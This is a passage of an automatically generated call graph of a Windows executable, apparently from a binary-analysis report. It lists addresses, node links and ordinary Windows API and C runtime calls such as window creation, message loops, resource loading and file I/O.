987f41 59 API calls 98976->98979 98981 9bd530 98979->98981 98980 983c60 98980->98982 99207 9844cb Shell_NotifyIconW _memset 98980->99207 98983 9bd53a 98981->98983 98984 9bd55f 98981->98984 98982->98951 98987 987e0b 59 API calls 98983->98987 98986 987e0b 59 API calls 98984->98986 98988 9bd55b GetForegroundWindow ShellExecuteW 98986->98988 98989 9bd545 98987->98989 98992 9bd58f Mailbox 98988->98992 99210 987c8e 98989->99210 98992->98982 98994 987e0b 59 API calls 98994->98988 98995->98934 98996->98939 98997->98941 98999 9877c7 59 API calls 98998->98999 99000 98378e 98999->99000 99219 983d43 99000->99219 99002 9837ac 99003 984864 61 API calls 99002->99003 99004 9837c0 99003->99004 99005 987f41 59 API calls 99004->99005 99006 9837cd 99005->99006 99233 984f3d 99006->99233 99009 9bd3ae 99304 9e97e5 99009->99304 99010 9837ee Mailbox 99257 9881a7 99010->99257 99014 9bd3cd 99016 9a2f95 _free 58 API calls 99014->99016 99018 9bd3da 99016->99018 99020 984faa 84 API calls 99018->99020 99022 9bd3e3 99020->99022 99026 983ee2 59 API calls 99022->99026 99023 987f41 59 API calls 99024 98381a 99023->99024 99264 988620 99024->99264 99028 9bd3fe 99026->99028 99027 98382c Mailbox 99029 987f41 59 API calls 99027->99029 99030 983ee2 59 API calls 99028->99030 99031 983852 99029->99031 99033 9bd41a 99030->99033 99032 988620 69 API calls 99031->99032 99036 983861 Mailbox 99032->99036 99034 984864 61 API calls 99033->99034 99035 9bd43f 99034->99035 99037 983ee2 59 API calls 99035->99037 99039 9877c7 59 API calls 99036->99039 99038 9bd44b 99037->99038 99040 9881a7 59 API calls 99038->99040 99041 98387f 99039->99041 99042 9bd459 99040->99042 99268 983ee2 99041->99268 99044 983ee2 59 API calls 99042->99044 99050 9bd468 99044->99050 99047 983899 99047->99022 99048 9838a3 99047->99048 99049 9a313d _W_store_winword 60 API calls 99048->99049 99051 9838ae 99049->99051 99052 9881a7 59 API calls 99050->99052 99051->99028 99053 9838b8 99051->99053 99055 9bd48a 99052->99055 99054 9a313d _W_store_winword 60 API calls 99053->99054 99057 9838c3 99054->99057 99056 983ee2 59 API calls 99055->99056 99058 9bd497 99056->99058 99057->99033 99059 9838cd 99057->99059 99058->99058 99060 9a313d _W_store_winword 60 API calls 99059->99060 99061 9838d8 99060->99061 99061->99050 99062 983919 99061->99062 99064 983ee2 59 API calls 99061->99064 99062->99050 99063 983926 99062->99063 99284 98942e 99063->99284 99065 9838fc 99064->99065 99068 9881a7 59 API calls 99065->99068 99070 98390a 99068->99070 99072 983ee2 59 API calls 99070->99072 99072->99062 99074 9893ea 59 API calls 99076 983961 99074->99076 99075 989040 60 API calls 99075->99076 99076->99074 99076->99075 99077 983ee2 59 API calls 99076->99077 99078 9839a7 Mailbox 99076->99078 99077->99076 99078->98948 99080 9873f2 __write_nolock 99079->99080 99081 9bee4b _memset 99080->99081 99082 98740b 99080->99082 99085 9bee67 GetOpenFileNameW 99081->99085 99083 9848ae 60 API calls 99082->99083 99084 987414 99083->99084 100086 9a09d5 99084->100086 99087 9beeb6 99085->99087 99089 987d2c 59 API calls 99087->99089 99090 9beecb 99089->99090 99090->99090 99092 987429 100104 9869ca 99092->100104 99096 990a9a __write_nolock 99095->99096 100361 986ee0 99096->100361 99098 990a9f 99110 983c26 99098->99110 100372 9912fe 89 API calls 99098->100372 99100 990aac 99100->99110 100373 994047 91 API calls Mailbox 99100->100373 99102 990ab5 99103 990ab9 GetFullPathNameW 99102->99103 99102->99110 99104 987d2c 59 API calls 99103->99104 99105 990ae5 99104->99105 99106 987d2c 59 API calls 99105->99106 99107 990af2 99106->99107 99108 9c50d5 _wcscat 99107->99108 99109 987d2c 59 API calls 99107->99109 99109->99110 99110->98957 99110->98965 99112 9bd49c 99111->99112 99113 983ac2 LoadImageW RegisterClassExW 99111->99113 100377 9848fe LoadImageW EnumResourceNamesW 99112->100377 100376 983041 7 API calls 99113->100376 99116 983b46 99118 9839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99116->99118 99117 9bd4a5 99118->98973 99120 984406 _memset 99119->99120 100378 984213 99120->100378 99124 9844c1 Shell_NotifyIconW 99127 9844b3 99124->99127 99125 9844a5 Shell_NotifyIconW 99125->99127 99126 98448b 99126->99124 99126->99125 100382 98410d 99127->100382 99129 9844ba 99129->98975 99131 9c50ed 99130->99131 99143 990b55 99130->99143 100475 9ea0b5 89 API calls 4 library calls 99131->100475 99133 990e5a 99133->98980 99136 991044 99136->99133 99137 991051 99136->99137 100473 9911f3 341 API calls Mailbox 99137->100473 99138 990bab PeekMessageW 99206 990b65 Mailbox 99138->99206 99141 991058 LockWindowUpdate DestroyWindow GetMessageW 99141->99133 99145 99108a 99141->99145 99142 990e44 99142->99133 100472 9911d0 10 API calls Mailbox 99142->100472 99143->99206 100476 989fbd 60 API calls 99143->100476 100477 9d68bf 341 API calls 99143->100477 99144 9c52ab Sleep 99144->99206 99147 9c6082 TranslateMessage DispatchMessageW GetMessageW 99145->99147 99147->99147 99148 9c60b2 99147->99148 99148->99133 99149 9c517a TranslateAcceleratorW 99152 990fa3 PeekMessageW 99149->99152 99149->99206 99150 989fbd 60 API calls 99150->99206 99151 990fbf TranslateMessage DispatchMessageW 99151->99152 99152->99206 99153 9c5c49 WaitForSingleObject 99157 9c5c66 GetExitCodeProcess CloseHandle 99153->99157 99153->99206 99155 9a0ff6 59 API calls Mailbox 99155->99206 99156 990e73 timeGetTime 99156->99206 99190 9910f5 99157->99190 99158 990fdd Sleep 99191 990fee Mailbox 99158->99191 99159 9881a7 59 API calls 99159->99206 99160 9877c7 59 API calls 99160->99191 99161 9c5f22 Sleep 99161->99191 99164 9a0719 timeGetTime 99164->99191 99165 9910ae timeGetTime 100474 989fbd 60 API calls 99165->100474 99168 9c5fb9 GetExitCodeProcess 99171 9c5fcf WaitForSingleObject 99168->99171 99172 9c5fe5 CloseHandle 99168->99172 99170 98b93d 109 API calls 99170->99191 99171->99172 99171->99206 99172->99191 99175 a061ac 110 API calls 99175->99191 99176 9c5c9e 99176->99190 99177 9c54a2 Sleep 99177->99206 99178 9c6041 Sleep 99178->99206 99180 987f41 59 API calls 99180->99191 99184 98a000 314 API calls 99184->99206 99190->98980 99191->99160 99191->99164 99191->99168 99191->99170 99191->99175 99191->99176 99191->99177 99191->99178 99191->99180 99191->99190 99191->99206 100502 9e28f7 60 API calls 99191->100502 100503 989fbd 60 API calls 99191->100503 100504 988b13 69 API calls Mailbox 99191->100504 100505 98b89c 341 API calls 99191->100505 100506 9d6a50 60 API calls 99191->100506 100507 9e54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99191->100507 100508 9e3e91 66 API calls Mailbox 99191->100508 99192 987f41 59 API calls 99192->99206 99193 9ea0b5 89 API calls 99193->99206 99195 989df0 59 API calls Mailbox 99195->99206 99196 988620 69 API calls 99196->99206 99197 98b89c 314 API calls 99197->99206 99199 9d66f4 59 API calls Mailbox 99199->99206 99200 9c59ff VariantClear 99200->99206 99201 9c5a95 VariantClear 99201->99206 99202 988e34 59 API calls Mailbox 99202->99206 99203 9c5843 VariantClear 99203->99206 99204 9d7405 59 API calls 99204->99206 99205 988b13 69 API calls 99205->99206 99206->99138 99206->99142 99206->99144 99206->99149 99206->99150 99206->99151 99206->99152 99206->99153 99206->99155 99206->99156 99206->99158 99206->99159 99206->99161 99206->99165 99206->99184 99206->99190 99206->99191 99206->99192 99206->99193 99206->99195 99206->99196 99206->99197 99206->99199 99206->99200 99206->99201 99206->99202 99206->99203 99206->99204 99206->99205 100410 98e580 99206->100410 100417 98e800 99206->100417 100450 98f5c0 99206->100450 100470 98fe40 341 API calls 2 library calls 99206->100470 100471 9831ce IsDialogMessageW GetClassLongW 99206->100471 100478 a0629f 59 API calls 99206->100478 100479 9e9c9f 59 API calls Mailbox 99206->100479 100480 9dd9e3 59 API calls 99206->100480 100481 989997 99206->100481 100499 9d6665 59 API calls 2 library calls 99206->100499 100500 988561 59 API calls 99206->100500 100501 98843f 59 API calls Mailbox 99206->100501 99207->98982 99208->98957 99209->98969 99211 987ca0 99210->99211 99212 9bf094 99210->99212 100858 987bb1 99211->100858 100864 9d8123 59 API calls _memmove 99212->100864 99215 987cac 99215->98994 99216 9bf09e 99217 9881a7 59 API calls 99216->99217 99218 9bf0a6 Mailbox 99217->99218 99220 983d50 __write_nolock 99219->99220 99221 987d2c 59 API calls 99220->99221 99226 983eb6 Mailbox 99220->99226 99223 983d82 99221->99223 99229 983db8 Mailbox 99223->99229 99345 987b52 99223->99345 99224 983e89 99225 987f41 59 API calls 99224->99225 99224->99226 99228 983eaa 99225->99228 99226->99002 99227 987f41 59 API calls 99227->99229 99230 983f84 59 API calls 99228->99230 99229->99224 99229->99226 99229->99227 99231 983f84 59 API calls 99229->99231 99232 987b52 59 API calls 99229->99232 99230->99226 99231->99229 99232->99229 99348 984d13 99233->99348 99238 984f68 LoadLibraryExW 99358 984cc8 99238->99358 99239 9bdd0f 99240 984faa 84 API calls 99239->99240 99243 9bdd16 99240->99243 99245 984cc8 3 API calls 99243->99245 99247 9bdd1e 99245->99247 99246 984f8f 99246->99247 99248 984f9b 99246->99248 99384 98506b 99247->99384 99249 984faa 84 API calls 99248->99249 99251 9837e6 99249->99251 99251->99009 99251->99010 99254 9bdd45 99392 985027 99254->99392 99256 9bdd52 99258 983801 99257->99258 99259 9881b2 99257->99259 99261 9893ea 99258->99261 99819 9880d7 59 API calls 2 library calls 99259->99819 99262 9a0ff6 Mailbox 59 API calls 99261->99262 99263 98380d 99262->99263 99263->99023 99265 98862b 99264->99265 99267 988652 99265->99267 99820 988b13 69 API calls Mailbox 99265->99820 99267->99027 99269 983eec 99268->99269 99270 983f05 99268->99270 99271 9881a7 59 API calls 99269->99271 99272 987d2c 59 API calls 99270->99272 99273 98388b 99271->99273 99272->99273 99274 9a313d 99273->99274 99275 9a31be 99274->99275 99276 9a3149 99274->99276 99823 9a31d0 60 API calls 4 library calls 99275->99823 99283 9a316e 99276->99283 99821 9a8d68 58 API calls __getptd_noexit 99276->99821 99279 9a31cb 99279->99047 99280 9a3155 99822 9a8ff6 9 API calls __wcsicmp_l 99280->99822 99282 9a3160 99282->99047 99283->99047 99285 989436 99284->99285 99286 9a0ff6 Mailbox 59 API calls 99285->99286 99287 989444 99286->99287 99288 983936 99287->99288 99824 98935c 59 API calls Mailbox 99287->99824 99290 9891b0 99288->99290 99825 9892c0 99290->99825 99292 9a0ff6 Mailbox 59 API calls 99293 983944 99292->99293 99295 989040 99293->99295 99294 9891bf 99294->99292 99294->99293 99296 9bf5a5 99295->99296 99298 989057 99295->99298 99296->99298 99835 988d3b 59 API calls Mailbox 99296->99835 99299 989158 99298->99299 99300 9891a0 99298->99300 99303 98915f 99298->99303 99302 9a0ff6 Mailbox 59 API calls 99299->99302 99834 989e9c 60 API calls Mailbox 99300->99834 99302->99303 99303->99076 99305 985045 85 API calls 99304->99305 99306 9e9854 99305->99306 99836 9e99be 99306->99836 99309 98506b 74 API calls 99310 9e9881 99309->99310 99311 98506b 74 API calls 99310->99311 99312 9e9891 99311->99312 99313 98506b 74 API calls 99312->99313 99314 9e98ac 99313->99314 99315 98506b 74 API calls 99314->99315 99316 9e98c7 99315->99316 99317 985045 85 API calls 99316->99317 99318 9e98de 99317->99318 99319 9a594c _W_store_winword 58 API calls 99318->99319 99320 9e98e5 99319->99320 99321 9a594c _W_store_winword 58 API calls 99320->99321 99322 9e98ef 99321->99322 99323 98506b 74 API calls 99322->99323 99324 9e9903 99323->99324 99325 9e9393 GetSystemTimeAsFileTime 99324->99325 99326 9e9916 99325->99326 99327 9e992b 99326->99327 99328 9e9940 99326->99328 99329 9a2f95 _free 58 API calls 99327->99329 99330 9e9946 99328->99330 99331 9e99a5 99328->99331 99333 9e9931 99329->99333 99842 9e8d90 99330->99842 99332 9a2f95 _free 58 API calls 99331->99332 99335 9bd3c1 99332->99335 99336 9a2f95 _free 58 API calls 99333->99336 99335->99014 99339 984faa 99335->99339 99336->99335 99338 9a2f95 _free 58 API calls 99338->99335 99340 984fb4 99339->99340 99342 984fbb 99339->99342 99341 9a55d6 __fcloseall 83 API calls 99340->99341 99341->99342 99343 984fca 99342->99343 99344 984fdb FreeLibrary 99342->99344 99343->99014 99344->99343 99346 987faf 59 API calls 99345->99346 99347 987b5d 99346->99347 99347->99223 99397 984d61 99348->99397 99351 984d3a 99352 984d4a FreeLibrary 99351->99352 99353 984d53 99351->99353 99352->99353 99355 9a548b 99353->99355 99354 984d61 2 API calls 99354->99351 99401 9a54a0 99355->99401 99357 984f5c 99357->99238 99357->99239 99559 984d94 99358->99559 99361 984d08 99365 984dd0 99361->99365 99362 984cff FreeLibrary 99362->99361 99363 984d94 2 API calls 99364 984ced 99363->99364 99364->99361 99364->99362 99366 9a0ff6 Mailbox 59 API calls 99365->99366 99367 984de5 99366->99367 99368 98538e 59 API calls 99367->99368 99369 984df1 _memmove 99368->99369 99370 984e2c 99369->99370 99371 984ee9 99369->99371 99372 984f21 99369->99372 99373 985027 69 API calls 99370->99373 99563 984fe9 CreateStreamOnHGlobal 99371->99563 99574 9e9ba5 95 API calls 99372->99574 99381 984e35 99373->99381 99376 98506b 74 API calls 99376->99381 99377 984ec9 99377->99246 99379 9bdcd0 99380 985045 85 API calls 99379->99380 99382 9bdce4 99380->99382 99381->99376 99381->99377 99381->99379 99569 985045 99381->99569 99383 98506b 74 API calls 99382->99383 99383->99377 99385 98507d 99384->99385 99386 9bddf6 99384->99386 99598 9a5812 99385->99598 99389 9e9393 99796 9e91e9 99389->99796 99391 9e93a9 99391->99254 99393 985036 99392->99393 99396 9bddb9 99392->99396 99801 9a5e90 99393->99801 99395 98503e 99395->99256 99398 984d2e 99397->99398 99399 984d6a LoadLibraryA 99397->99399 99398->99351 99398->99354 99399->99398 99400 984d7b GetProcAddress 99399->99400 99400->99398 99404 9a54ac __wfsopen 99401->99404 99402 9a54bf 99450 9a8d68 58 API calls __getptd_noexit 99402->99450 99404->99402 99406 9a54f0 99404->99406 99405 9a54c4 99451 9a8ff6 9 API calls __wcsicmp_l 99405->99451 99420 9b0738 99406->99420 99409 9a54f5 99410 9a550b 99409->99410 99411 9a54fe 99409->99411 99413 9a5535 99410->99413 99414 9a5515 99410->99414 99452 9a8d68 58 API calls __getptd_noexit 99411->99452 99435 9b0857 99413->99435 99453 9a8d68 58 API calls __getptd_noexit 99414->99453 99417 9a54cf __wfsopen @_EH4_CallFilterFunc@8 99417->99357 99421 9b0744 __wfsopen 99420->99421 99422 9a9e4b __lock 58 API calls 99421->99422 99433 9b0752 99422->99433 99423 9b07c6 99455 9b084e 99423->99455 99424 9b07cd 99460 9a8a5d 58 API calls 2 library calls 99424->99460 99427 9b07d4 99427->99423 99461 9aa06b InitializeCriticalSectionAndSpinCount 99427->99461 99428 9b0843 __wfsopen 99428->99409 99430 9a9ed3 __mtinitlocknum 58 API calls 99430->99433 99432 9b07fa EnterCriticalSection 99432->99423 99433->99423 99433->99424 99433->99430 99458 9a6e8d 59 API calls __lock 99433->99458 99459 9a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99433->99459 99436 9b0877 __wopenfile 99435->99436 99437 9b0891 99436->99437 99449 9b0a4c 99436->99449 99468 9a3a0b 60 API calls 3 library calls 99436->99468 99466 9a8d68 58 API calls __getptd_noexit 99437->99466 99439 9b0896 99467 9a8ff6 9 API calls __wcsicmp_l 99439->99467 99441 9a5540 99454 9a5562 LeaveCriticalSection LeaveCriticalSection _fseek 99441->99454 99442 9b0aaf 99463 9b87f1 99442->99463 99445 9b0a45 99445->99449 99469 9a3a0b 60 API calls 3 library calls 99445->99469 99447 9b0a64 99447->99449 99470 9a3a0b 60 API calls 3 library calls 99447->99470 99449->99437 99449->99442 99450->99405 99451->99417 99452->99417 99453->99417 99454->99417 99462 9a9fb5 LeaveCriticalSection 99455->99462 99457 9b0855 99457->99428 99458->99433 99459->99433 99460->99427 99461->99432 99462->99457 99471 9b7fd5 99463->99471 99465 9b880a 99465->99441 99466->99439 99467->99441 99468->99445 99469->99447 99470->99449 99474 9b7fe1 __wfsopen 99471->99474 99472 9b7ff7 99556 9a8d68 58 API calls __getptd_noexit 99472->99556 99474->99472 99476 9b802d 99474->99476 99475 9b7ffc 99557 9a8ff6 9 API calls __wcsicmp_l 99475->99557 99482 9b809e 99476->99482 99479 9b8049 99558 9b8072 LeaveCriticalSection __unlock_fhandle 99479->99558 99481 9b8006 __wfsopen 99481->99465 99483 9b80be 99482->99483 99484 9a471a __wsopen_nolock 58 API calls 99483->99484 99488 9b80da 99484->99488 99485 9b8211 99486 9a9006 __invoke_watson 8 API calls 99485->99486 99487 9b87f0 99486->99487 99490 9b7fd5 __wsopen_helper 103 API calls 99487->99490 99488->99485 99489 9b8114 99488->99489 99496 9b8137 99488->99496 99491 9a8d34 __lseeki64 58 API calls 99489->99491 99492 9b880a 99490->99492 99493 9b8119 99491->99493 99492->99479 99494 9a8d68 _free 58 API calls 99493->99494 99495 9b8126 99494->99495 99498 9a8ff6 __wcsicmp_l 9 API calls 99495->99498 99497 9b81f5 99496->99497 99505 9b81d3 99496->99505 99499 9a8d34 __lseeki64 58 API calls 99497->99499 99500 9b8130 99498->99500 99501 9b81fa 99499->99501 99500->99479 99502 9a8d68 _free 58 API calls 99501->99502 99503 9b8207 99502->99503 99504 9a8ff6 __wcsicmp_l 9 API calls 99503->99504 99504->99485 99506 9ad4d4 __alloc_osfhnd 61 API calls 99505->99506 99507 9b82a1 99506->99507 99508 9b82ab 99507->99508 99509 9b82ce 99507->99509 99510 9a8d34 __lseeki64 58 API calls 99508->99510 99511 9b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99509->99511 99512 9b82b0 99510->99512 99519 9b82f0 99511->99519 99514 9a8d68 _free 58 API calls 99512->99514 99513 9b836e GetFileType 99517 9b83bb 99513->99517 99518 9b8379 GetLastError 99513->99518 99516 9b82ba 99514->99516 99515 9b833c GetLastError 99520 9a8d47 __dosmaperr 58 API calls 99515->99520 99521 9a8d68 _free 58 API calls 99516->99521 99528 9ad76a __set_osfhnd 59 API calls 99517->99528 99522 9a8d47 __dosmaperr 58 API calls 99518->99522 99519->99513 99519->99515 99523 9b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99519->99523 99524 9b8361 99520->99524 99521->99500 99525 9b83a0 CloseHandle 99522->99525 99527 9b8331 99523->99527 99530 9a8d68 _free 58 API calls 99524->99530 99525->99524 99526 9b83ae 99525->99526 99529 9a8d68 _free 58 API calls 99526->99529 99527->99513 99527->99515 99533 9b83d9 99528->99533 99531 9b83b3 99529->99531 99530->99485 99531->99524 99532 9b8594 99532->99485 99535 9b8767 CloseHandle 99532->99535 99533->99532 99534 9b1b11 __lseeki64_nolock 60 API calls 99533->99534 99551 9b845a 99533->99551 99536 9b8443 99534->99536 99537 9b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99535->99537 99538 9a8d34 __lseeki64 58 API calls 99536->99538 99536->99551 99539 9b878e 99537->99539 99538->99551 99540 9b87c2 99539->99540 99541 9b8796 GetLastError 99539->99541 99540->99485 99542 9a8d47 __dosmaperr 58 API calls 99541->99542 99543 9b87a2 99542->99543 99547 9ad67d __free_osfhnd 59 API calls 99543->99547 99544 9b0d2d __close_nolock 61 API calls 99544->99551 99545 9b10ab 70 API calls __read_nolock 99545->99551 99546 9b848c 99548 9b99f2 __chsize_nolock 82 API calls 99546->99548 99546->99551 99547->99540 99548->99546 99549 9adac6 __write 78 API calls 99549->99551 99550 9b8611 99552 9b0d2d __close_nolock 61 API calls 99550->99552 99551->99532 99551->99544 99551->99545 99551->99546 99551->99549 99551->99550 99554 9b1b11 60 API calls __lseeki64_nolock 99551->99554 99553 9b8618 99552->99553 99555 9a8d68 _free 58 API calls 99553->99555 99554->99551 99555->99485 99556->99475 99557->99481 99558->99481 99560 984ce1 99559->99560 99561 984d9d LoadLibraryA 99559->99561 99560->99363 99560->99364 99561->99560 99562 984dae GetProcAddress 99561->99562 99562->99560 99564 985003 FindResourceExW 99563->99564 99568 985020 99563->99568 99565 9bdd5c LoadResource 99564->99565 99564->99568 99566 9bdd71 SizeofResource 99565->99566 99565->99568 99567 9bdd85 LockResource 99566->99567 99566->99568 99567->99568 99568->99370 99570 985054 99569->99570 99571 9bddd4 99569->99571 99575 9a5a7d 99570->99575 99573 985062 99573->99381 99574->99370 99577 9a5a89 __wfsopen 99575->99577 99576 9a5a9b 99588 9a8d68 58 API calls __getptd_noexit 99576->99588 99577->99576 99579 9a5ac1 99577->99579 99590 9a6e4e 99579->99590 99580 9a5aa0 99589 9a8ff6 9 API calls __wcsicmp_l 99580->99589 99583 9a5ac7 99596 9a59ee 83 API calls 5 library calls 99583->99596 99585 9a5ad6 99597 9a5af8 LeaveCriticalSection LeaveCriticalSection _fseek 99585->99597 99587 9a5aab __wfsopen 99587->99573 99588->99580 99589->99587 99591 9a6e5e 99590->99591 99592 9a6e80 EnterCriticalSection 99590->99592 99591->99592 99593 9a6e66 99591->99593 99595 9a6e76 99592->99595 99594 9a9e4b __lock 58 API calls 99593->99594 99594->99595 99595->99583 99596->99585 99597->99587 99601 9a582d 99598->99601 99600 98508e 99600->99389 99602 9a5839 __wfsopen 99601->99602 99603 9a584f _memset 99602->99603 99604 9a587c 99602->99604 99605 9a5874 __wfsopen 99602->99605 99628 9a8d68 58 API calls __getptd_noexit 99603->99628 99606 9a6e4e __lock_file 59 API calls 99604->99606 99605->99600 99608 9a5882 99606->99608 99614 9a564d 99608->99614 99609 9a5869 99629 9a8ff6 9 API calls __wcsicmp_l 99609->99629 99615 9a5683 99614->99615 99619 9a5668 _memset 99614->99619 99630 9a58b6 LeaveCriticalSection LeaveCriticalSection _fseek 99615->99630 99616 9a5673 99726 9a8d68 58 API calls __getptd_noexit 99616->99726 99618 9a5678 99727 9a8ff6 9 API calls __wcsicmp_l 99618->99727 99619->99615 99619->99616 99622 9a56c3 99619->99622 99622->99615 99623 9a57d4 _memset 99622->99623 99631 9a4916 99622->99631 99638 9b10ab 99622->99638 99706 9b0df7 99622->99706 99728 9b0f18 58 API calls 4 library calls 99622->99728 99729 9a8d68 58 API calls __getptd_noexit 99623->99729 99628->99609 99629->99605 99630->99605 99632 9a4920 99631->99632 99633 9a4935 99631->99633 99730 9a8d68 58 API calls __getptd_noexit 99632->99730 99633->99622 99635 9a4925 99731 9a8ff6 9 API calls __wcsicmp_l 99635->99731 99637 9a4930 99637->99622 99639 9b10cc 99638->99639 99640 9b10e3 99638->99640 99741 9a8d34 58 API calls __getptd_noexit 99639->99741 99642 9b181b 99640->99642 99646 9b111d 99640->99646 99757 9a8d34 58 API calls __getptd_noexit 99642->99757 99643 9b10d1 99742 9a8d68 58 API calls __getptd_noexit 99643->99742 99648 9b1125 99646->99648 99654 9b113c 99646->99654 99647 9b1820 99758 9a8d68 58 API calls __getptd_noexit 99647->99758 99743 9a8d34 58 API calls __getptd_noexit 99648->99743 99651 9b1131 99759 9a8ff6 9 API calls __wcsicmp_l 99651->99759 99652 9b112a 99744 9a8d68 58 API calls __getptd_noexit 99652->99744 99655 9b1151 99654->99655 99657 9b116b 99654->99657 99659 9b1189 99654->99659 99686 9b10d8 99654->99686 99745 9a8d34 58 API calls __getptd_noexit 99655->99745 99657->99655 99662 9b1176 99657->99662 99746 9a8a5d 58 API calls 2 library calls 99659->99746 99732 9b5ebb 99662->99732 99663 9b1199 99665 9b11bc 99663->99665 99666 9b11a1 99663->99666 99664 9b128a 99668 9b1303 ReadFile 99664->99668 99673 9b12a0 GetConsoleMode 99664->99673 99749 9b1b11 60 API calls 3 library calls 99665->99749 99747 9a8d68 58 API calls __getptd_noexit 99666->99747 99671 9b17e3 GetLastError 99668->99671 99672 9b1325 99668->99672 99670 9b11a6 99748 9a8d34 58 API calls __getptd_noexit 99670->99748 99675 9b17f0 99671->99675 99676 9b12e3 99671->99676 99672->99671 99680 9b12f5 99672->99680 99677 9b1300 99673->99677 99678 9b12b4 99673->99678 99755 9a8d68 58 API calls __getptd_noexit 99675->99755 99690 9b12e9 99676->99690 99750 9a8d47 58 API calls 2 library calls 99676->99750 99677->99668 99678->99677 99681 9b12ba ReadConsoleW 99678->99681 99688 9b15c7 99680->99688 99689 9b135a 99680->99689 99680->99690 99681->99680 99683 9b12dd GetLastError 99681->99683 99682 9b17f5 99756 9a8d34 58 API calls __getptd_noexit 99682->99756 99683->99676 99686->99622 99687 9a2f95 _free 58 API calls 99687->99686 99688->99690 99694 9b16cd ReadFile 99688->99694 99692 9b1447 99689->99692 99693 9b13c6 ReadFile 99689->99693 99690->99686 99690->99687 99692->99690 99696 9b1504 99692->99696 99697 9b14f4 99692->99697 99701 9b14b4 MultiByteToWideChar 99692->99701 99695 9b13e7 GetLastError 99693->99695 99704 9b13f1 99693->99704 99699 9b16f0 GetLastError 99694->99699 99705 9b16fe 99694->99705 99695->99704 99696->99701 99753 9b1b11 60 API calls 3 library calls 99696->99753 99752 9a8d68 58 API calls __getptd_noexit 99697->99752 99699->99705 99701->99683 99701->99690 99704->99689 99751 9b1b11 60 API calls 3 library calls 99704->99751 99705->99688 99754 9b1b11 60 API calls 3 library calls 99705->99754 99707 9b0e02 99706->99707 99711 9b0e17 99706->99711 99793 9a8d68 58 API calls __getptd_noexit 99707->99793 99709 9b0e07 99794 9a8ff6 9 API calls __wcsicmp_l 99709->99794 99712 9b0e4c 99711->99712 99717 9b0e12 99711->99717 99795 9b6234 58 API calls __malloc_crt 99711->99795 99714 9a4916 __flsbuf 58 API calls 99712->99714 99715 9b0e60 99714->99715 99760 9b0f97 99715->99760 99717->99622 99718 9b0e67 99718->99717 99719 9a4916 __flsbuf 58 API calls 99718->99719 99720 9b0e8a 99719->99720 99720->99717 99721 9a4916 __flsbuf 58 API calls 99720->99721 99722 9b0e96 99721->99722 99722->99717 99723 9a4916 __flsbuf 58 API calls 99722->99723 99724 9b0ea3 99723->99724 99725 9a4916 __flsbuf 58 API calls 99724->99725 99725->99717 99726->99618 99727->99615 99728->99622 99729->99618 99730->99635 99731->99637 99733 9b5ed3 99732->99733 99734 9b5ec6 99732->99734 99736 9b5edf 99733->99736 99737 9a8d68 _free 58 API calls 99733->99737 99735 9a8d68 _free 58 API calls 99734->99735 99738 9b5ecb 99735->99738 99736->99664 99739 9b5f00 99737->99739 99738->99664 99740 9a8ff6 __wcsicmp_l 9 API calls 99739->99740 99740->99738 99741->99643 99742->99686 99743->99652 99744->99651 99745->99652 99746->99663 99747->99670 99748->99686 99749->99662 99750->99690 99751->99704 99752->99690 99753->99701 99754->99705 99755->99682 99756->99690 99757->99647 99758->99651 99759->99686 99761 9b0fa3 __wfsopen 99760->99761 99762 9b0fb0 99761->99762 99763 9b0fc7 99761->99763 99765 9a8d34 __lseeki64 58 API calls 99762->99765 99764 9b108b 99763->99764 99767 9b0fdb 99763->99767 99768 9a8d34 __lseeki64 58 API calls 99764->99768 99766 9b0fb5 99765->99766 99769 9a8d68 _free 58 API calls 99766->99769 99770 9b0ff9 99767->99770 99771 9b1006 99767->99771 99772 9b0ffe 99768->99772 99781 9b0fbc __wfsopen 99769->99781 99773 9a8d34 __lseeki64 58 API calls 99770->99773 99774 9b1028 99771->99774 99775 9b1013 99771->99775 99777 9a8d68 _free 58 API calls 99772->99777 99773->99772 99776 9ad446 ___lock_fhandle 59 API calls 99774->99776 99778 9a8d34 __lseeki64 58 API calls 99775->99778 99779 9b102e 99776->99779 99780 9b1020 99777->99780 99782 9b1018 99778->99782 99783 9b1041 99779->99783 99784 9b1054 99779->99784 99787 9a8ff6 __wcsicmp_l 9 API calls 99780->99787 99781->99718 99785 9a8d68 _free 58 API calls 99782->99785 99786 9b10ab __read_nolock 70 API calls 99783->99786 99788 9a8d68 _free 58 API calls 99784->99788 99785->99780 99789 9b104d 99786->99789 99787->99781 99790 9b1059 99788->99790 99792 9b1083 __read LeaveCriticalSection 99789->99792 99791 9a8d34 __lseeki64 58 API calls 99790->99791 99791->99789 99792->99781 99793->99709 99794->99717 99795->99712 99799 9a543a GetSystemTimeAsFileTime 99796->99799 99798 9e91f8 99798->99391 99800 9a5468 __aulldiv 99799->99800 99800->99798 99802 9a5e9c __wfsopen 99801->99802 99803 9a5eae 99802->99803 99804 9a5ec3 99802->99804 99815 9a8d68 58 API calls __getptd_noexit 99803->99815 99805 9a6e4e __lock_file 59 API calls 99804->99805 99807 9a5ec9 99805->99807 99817 9a5b00 67 API calls 7 library calls 99807->99817 99808 9a5eb3 99816 9a8ff6 9 API calls __wcsicmp_l 99808->99816 99811 9a5ed4 99818 9a5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99811->99818 99813 9a5ee6 99814 9a5ebe __wfsopen 99813->99814 99814->99395 99815->99808 99816->99814 99817->99811 99818->99813 99819->99258 99820->99267 99821->99280 99822->99282 99823->99279 99824->99288 99826 9892c9 Mailbox 99825->99826 99827 9bf5c8 99826->99827 99832 9892d3 99826->99832 99829 9a0ff6 Mailbox 59 API calls 99827->99829 99828 9892da 99828->99294 99830 9bf5d4 99829->99830 99832->99828 99833 989df0 59 API calls Mailbox 99832->99833 99833->99832 99834->99303 99835->99298 99840 9e99d2 __tzset_nolock _wcscmp 99836->99840 99837 98506b 74 API calls 99837->99840 99838 9e9866 99838->99309 99838->99335 99839 9e9393 GetSystemTimeAsFileTime 99839->99840 99840->99837 99840->99838 99840->99839 99841 985045 85 API calls 99840->99841 99841->99840 99843 9e8da9 99842->99843 99844 9e8d9b 99842->99844 99846 9e8dee 99843->99846 99847 9a548b 115 API calls 99843->99847 99872 9e8db2 99843->99872 99845 9a548b 115 API calls 99844->99845 99845->99843 99873 9e901b 